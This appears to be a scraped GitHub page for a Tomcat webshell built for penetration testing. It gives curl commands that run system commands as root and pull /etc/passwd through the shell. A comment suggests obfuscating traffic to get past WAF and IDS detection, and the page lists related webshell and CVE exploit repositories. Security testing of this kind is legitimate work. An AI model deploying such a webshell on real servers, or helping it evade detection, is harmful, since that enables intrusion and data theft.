A webshell application and interactive shell for pentesting Apache Tomcat servers.

Overview

Apache Tomcat webshell application for RCE

A webshell application and interactive shell for pentesting Apache Tomcat servers.
GitHub release (latest by date) YouTube Channel Subscribers

Features

  • Webshell plugin for Apache Tomcat.
  • Execute system commands via an API with ?action=exec.
  • Download files from the remote system to your attacking machine ?action=download.

Usage

Requirements: You need to have the credentials of an high privilege account of the Apache Tomcat server.

Step 1: Access the Tomcat manager and upload the webshell plugin

First of all, you will need to access the Apache Tomcat /manager page at http://127.0.0.1:10080/manager/html, and connect to it with an high privilege account of the Apache Tomcat server.

Then choose the WAR file of the webshell plugin and click on "Deploy":

And the application is deployed:

Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/webshell/api with action=exec&cmd=id:

$ curl -X POST 'http://127.0.0.1:10080/webshell/api' --data "action=exec&cmd=id"
{"stdout":"uid=0(root) gid=0(root) groups=0(root)\n","stderr":"","exec":["/bin/bash","-c","id"]}

You can also access it by a GET request from a browser:

Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/webshell/api with action=download&cmd=/etc/passwd:

$ curl -X POST 'http://127.0.0.1:10080/webshell/api' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Step 3: The interactive console

When your webshell is active, you can now use the interactive console.py to execute commands and download remote files.

demo.mp4

Development

If you need to compile this plugin, you can use the docker image provided, simply type make to build your plugin present in the webshell folder. Output WAR files will be put in the ./webshell/dist/ folder.

Then if you need to test the plugin locally, you can start an Apache Tomcat instance with the test environnement in ./test_env/.

References

You might also like...

This is a plugin for Minecraft Server (Spigot API) introduces a sector system which connects a single world across multiple servers.

OpenSourceSectors 😎 🗒️ This is a plugin for Minecraft Server (Spigot API) introduces a sector system which connects a single world across multiple s

Sep 25, 2022

Asynchronous, high-performance Minecraft Hologram library for 1.8-1.18 servers.

Asynchronous, high-performance Minecraft Hologram library for 1.8-1.18 servers.

Hologram-Lib Asynchronous, high-performance Minecraft Hologram library for 1.8-1.18 servers. Requirements This library can only be used on spigot serv

Sep 26, 2022

A Velocity proxy plugin for Minecraft server discovery in k8s. All discovered servers are automatically added to the Velocity proxy.

kryo-server-discovery This plugin connects minecraft servers to a velocity proxy within Kubernetes. The service account in the namespace which the pro

Sep 13, 2022

Distribute players across multiple servers while syncing packets

Distribute players across multiple servers while syncing packets

ShardMC Distribute players across multiple servers while syncing packets ShardMC aims to be a simple plugin that allows multiple servers to sync playe

Dec 23, 2021

SpringBoot show case application for reactive-pulsar library (Reactive Streams adapter for Apache Pulsar Java Client)

Reactive Pulsar Client show case application Prerequisites Cloning reactive-pulsar Running this application requires cloning https://github.com/lhotar

Jul 4, 2022

This repository is for Todo application. This contains the Backend part of the application.

Todo Application 개요(Abstract) 개인용 할일 목록 리스트 앱플리케이션 구축 (Personal Todo List Application) 목적 1. React.js기초, AWS서버 활용, 스프링 부트 공부 목적으로 프로젝트 시작했습니다.

Jan 8, 2022

Android application made during an introduction class to mobile application development.

Reflex Revolution Android application made during an introduction class to mobile application development. Contributors Hailey Savoie Carter Moore Fre

Aug 27, 2022

source code of the live coding demo for "Building resilient and scalable API backends with Apache Pulsar and Spring Reactive" talk held at [email protected] 2021

reactive-iot-backend The is the source code of the live coding demo for "Building resilient and scalable API backends with Apache Pulsar and Spring Re

Jan 13, 2022

A Spring Boot Camel boilerplate that aims to consume events from Apache Kafka, process it and send to a PostgreSQL database.

SPRING-BOOT CAMEL BOILERPLATE This is a Spring-Boot Camel Application model that you can use as a reference to study or even to use in your company. I

Apr 4, 2022
Comments
  • About traffic encryption

    About traffic encryption

    Thank you very much for sharing your script. It would be better if parameters could be obfuscated and encrypted in GET or POST request and Response. In this way, you can bypass the detection of WAF or IDS without worry.

    opened by zzgxpyy 0
Owner
Podalirius
Security Researcher 🕵️‍♂️ | Speaker 📣
Podalirius
(周瑜)Java - SpringBoot 持久化 WebShell

工具仅用于安全研究,禁止使用工具发起非法攻击,造成的后果使用者负责 ZhouYu -> 周瑜 Java - SpringBoot 持久化 WebShell 背景:后Spring时代,SpringBoot jar部署模式下,一般没有了JSP,所有的模板都在jar内,当大家都热衷于内存马的时候,发现很容

threedr3am 450 Oct 1, 2022
openam-CVE-2021-35464 tomcat 执行命令回显

openam CVE-2021-35464 tomcat 执行命令回显. 项目基于 ysoserial 和 Java-Rce-Echo 构建项目需要在依赖中加入ysoserial.jar和jato-14.6.3.jar POST /OpenAM/ccversion/Version HTTP/1.1

Y4er 89 Jul 12, 2022
Sniffy - interactive profiler, testing and chaos engineering tool for Java

Sniffy Sniffy is a Java profiler which shows the results directly in your browser. It also brings profiling to your unit (or rather component) tests a

Sniffy 137 Oct 2, 2022
A tool to create flags for Paradox Interactive games.

Iron Workshop Flag Creator Instllation and Usage Instructions Instructional video here: https://youtu.be/0a8xXvN_ygk Flag Creator Purpose and Use The

null 5 Sep 11, 2022
Bank Statement Analyzer Application that currently runs in terminal with the commands: javac Application.java java Application [file-name].csv GUI coming soon...

Bank Statement Analyzer Application that currently runs in terminal with the commands: javac Application.java java Application [file-name].csv GUI coming soon...

Hayden Hanson 0 May 21, 2022
The Apache Software Foundation 525 Sep 29, 2022
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).

MC-Log4J-Patcher The goal of this project is to provide Minecraft players, and server owners, peace of mind in regards to the recently discovered Log4

Koupa Taylor 4 Jan 4, 2022
GreenMail is an open source, intuitive and easy-to-use test suite of email servers for testing purposes.

GreenMail GreenMail is an open source, intuitive and easy-to-use test suite of email servers for testing purposes. Supports SMTP, POP3, IMAP with SSL

null 509 Sep 24, 2022
A guild plugin for Minecraft Servers that supports 1.13 and above

OasisGuild Description A guild plugin for Minecraft Servers that supports 1.13 and above Languages zh_cn(简体中文) en_us(English) Placeholders %oasisguild

ChiyodaXiaoYi 2 Apr 6, 2022
LOQUI - Real-time chat application built using Apache Kafka, Java, Spring Boot, SockJS and React

LOQUI is a simple real-time chat application that demonstrates how to use Apache Kafka as a message broker along with Java, Spring Boot and React on the front-end

Castanho Correia 2 Jun 5, 2022